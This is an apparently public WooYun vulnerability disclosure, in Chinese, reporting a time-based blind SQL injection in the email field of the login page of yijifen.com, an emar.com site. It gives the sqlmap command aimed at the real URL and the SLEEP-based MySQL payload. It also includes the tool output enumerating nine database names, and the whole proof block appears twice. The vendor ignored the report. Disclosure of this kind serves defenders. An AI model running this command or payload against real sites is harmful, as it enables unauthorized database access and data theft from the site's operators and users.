漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0169890
漏洞标题:亿玛旗下另一主站存在注入
相关厂商:emar.com
漏洞作者: 头晕脑壳疼
提交时间:2016-01-18 17:41
修复时间:2016-01-23 17:50
公开时间:2016-01-23 17:50
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-18: 细节已通知厂商并且等待厂商处理中
2016-01-23: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
能不能首现?标题短小而精辟(影响多大,数据多少只有厂家清楚吧)
详细说明:
注入点
sqlmap -u "http://www.yijifen.com/dologin.do" --data "password=11111&=%E7%99%BB%20%E5%BD%95&email=11111"
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: password=11111&=%E7%99%BB %E5%BD%95&email=11111' AND (SELECT * FROM (SELECT(SLEEP(5)))MIYl) AND 'VpEL'='VpEL
---
[15:11:40] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0.12
[15:11:40] [INFO] fetching database names
[15:11:40] [INFO] fetching number of databases
[15:11:40] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[15:11:48] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[15:11:54] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
9
[15:12:05] [INFO] retrieved: information_schema
[15:18:24] [INFO] retrieved: dbaadmin
[15:20:51] [INFO] retrieved: eqile
[15:22:23] [INFO] retrieved: escore
[15:24:25] [INFO] retrieved: luckcat
[15:26:46] [INFO] retrieved: mysql
[15:28:33] [INFO] retrieved: performance_schema
[15:34:46] [INFO] retrieved: ssp
[15:36:01] [INFO] retrieved: test
available databases [9]:
[*] dbaadmin
[*] eqile
[*] escore
[*] information_schema
[*] luckcat
[*] mysql
[*] performance_schema
[*] ssp
[*] test
477张表
拆解的速度太慢,就不把数据跑出来了
漏洞证明:
注入点
sqlmap -u "http://www.yijifen.com/dologin.do" --data "password=11111&=%E7%99%BB%20%E5%BD%95&email=11111"
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: password=11111&=%E7%99%BB %E5%BD%95&email=11111' AND (SELECT * FROM (SELECT(SLEEP(5)))MIYl) AND 'VpEL'='VpEL
---
[15:11:40] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0.12
[15:11:40] [INFO] fetching database names
[15:11:40] [INFO] fetching number of databases
[15:11:40] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[15:11:48] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[15:11:54] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
9
[15:12:05] [INFO] retrieved: information_schema
[15:18:24] [INFO] retrieved: dbaadmin
[15:20:51] [INFO] retrieved: eqile
[15:22:23] [INFO] retrieved: escore
[15:24:25] [INFO] retrieved: luckcat
[15:26:46] [INFO] retrieved: mysql
[15:28:33] [INFO] retrieved: performance_schema
[15:34:46] [INFO] retrieved: ssp
[15:36:01] [INFO] retrieved: test
available databases [9]:
[*] dbaadmin
[*] eqile
[*] escore
[*] information_schema
[*] luckcat
[*] mysql
[*] performance_schema
[*] ssp
[*] test
477张表
拆解的速度太慢,就不把数据跑出来了
修复方案:
版权声明:转载请注明来源 头晕脑壳疼@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2016-01-23 17:50
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无